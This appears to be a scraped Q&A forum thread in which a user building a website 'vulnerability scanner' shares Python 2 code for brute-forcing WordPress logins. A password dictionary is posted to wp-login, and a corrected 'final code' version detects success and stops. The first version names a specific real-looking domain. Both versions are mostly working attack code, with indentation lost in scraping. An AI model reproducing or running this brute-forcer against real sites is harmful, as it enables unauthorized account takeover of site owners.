I've been doing a program called web-map. it scans a website for vulnerabilities. But I'm having some trouble with brute-forcing the wordpress login. This is the code which brute-force the login:
def brute_login(tgt, dictionary):
s = requests.Session()
pass_found = False
user = raw_input("User: ")
intent = 0
tgt = tgt+"/wp-login"
f = open(dictionary, 'r')
for word in f.readlines():
password = word.strip('\n')
intent+=1
payload = {'log': user, 'pwd': password, 'redirect_to': 'TARGET_URL/wp-admin', 'testcookie': '1', 'wp-submit': 'Access'}
print '[+] Trying with user: '+str(user)+' and password: '+str(password)+'\ttry: '+str(intent)
s.post(tgt, data=payload)
data = s.get("http://gerion.info/wp-admin").text
if 'Escritorio' in data or 'Desktop' in data:
print '[*] Password found: '+password
pass_found = True
else:
pass
I hope you can help me, Thanks!!
Ok, I found the solution. @payne the problem was I couldn't authenticate to the wordpress admin page. The solution was to let wordpress to set by his own his cookies. This is the final code:
def brute_login(tgt, dictionary):
s = requests.Session()
s.get(tgt)
user = raw_input("User: ")
intent = 0
tgt = tgt + "/wp-login.php"
passwords = []
with open(dictionary, 'r') as f:
passwords = f.read().rsplit('\n')
for password in passwords:
intent += 1
payload = {'log': user,'pwd': password}
print'[+] Trying with user: %s and password: %s\ttry: %s' % (user, password, intent)
data = s.post(tgt, data=payload)
if not 'ERROR' in data.text:
print '[*] Password found: '+password
exit(0)
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.